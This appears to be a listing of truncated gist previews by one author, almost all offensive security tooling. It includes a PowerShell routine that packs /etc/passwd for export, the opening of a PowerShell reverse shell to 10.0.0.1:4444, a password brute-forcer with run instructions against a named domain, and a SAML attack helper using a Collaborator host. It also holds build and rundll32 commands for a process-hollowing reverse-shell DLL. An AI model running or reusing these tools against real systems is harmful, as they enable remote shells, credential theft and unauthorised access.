FrankSpierings

$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
$fs.CopyTo($gzs);
$fs.Close();
$gzs.Close();
$ms.Close();

[System.Convert]::ToBase64String($ms.ToArray());

FrankSpierings

import codecs
import base64


data = '''$lhost="10.0.0.1";
$lport=4444;

$MAXCMDLENGTH=65535;
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();

FrankSpierings

// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;

internal class InfantAnnihilator
{
    private static void Main(string[] args)
    {

FrankSpierings

# Referenced sources:
# - Mimikatz
# - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/5cf2e6b9-3195-4f85-bc18-05b50e6d4e11
# - https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-publickeystruc

from io import BytesIO
import struct
import math
import codecs
from Crypto.PublicKey import RSA

FrankSpierings

/*
- Get the .jar files from the server (check .jnlp file).
- Extract those .jar files (unzip).
- Place Brutus.java in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7 Brutus.java
- Notice the target & source. Otherwise CORBA can't be found.

- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
*/

FrankSpierings

import xml.dom.minidom as minidom

# Constants
COLLABORATOR = 'example.burpcollaborator.net'


class SAMLRaider():
    def __init__(self, match_replace_map: dict = None):
        """SAMLRainder object

FrankSpierings

Pre-requirements

• Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
• Start the socket daemon iproxy 2222 44
• Install checkra1n exploit locally, run: brew install checkra1n
• When SSH password authentication is requested, use: alpline.

Wipe iPad and restore Firmware

• Clear all settings, or use DFU to clear and restore the iPad: https://www.theiphonewiki.com/wiki/DFU_Mode (Use iTunes to restore (and wipe) the iPad)

FrankSpierings

// docker run -it --rm -v `pwd`:/tmp/building  ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
//    rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
//    rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
//    rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe

FrankSpierings

from burp import IParameter
from burp import IBurpExtender
from burp import IContextMenuFactory
from burp import IContextMenuInvocation
from javax.swing import JMenuItem
import java.util.ArrayList as ArrayList
from threading import Thread
from Queue import Queue
from traceback import format_exc
import time

FrankSpierings

# coding=utf-8

from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IScannerInsertionPoint
from array import array


class BurpExtender(IBurpExtender, IScannerCheck):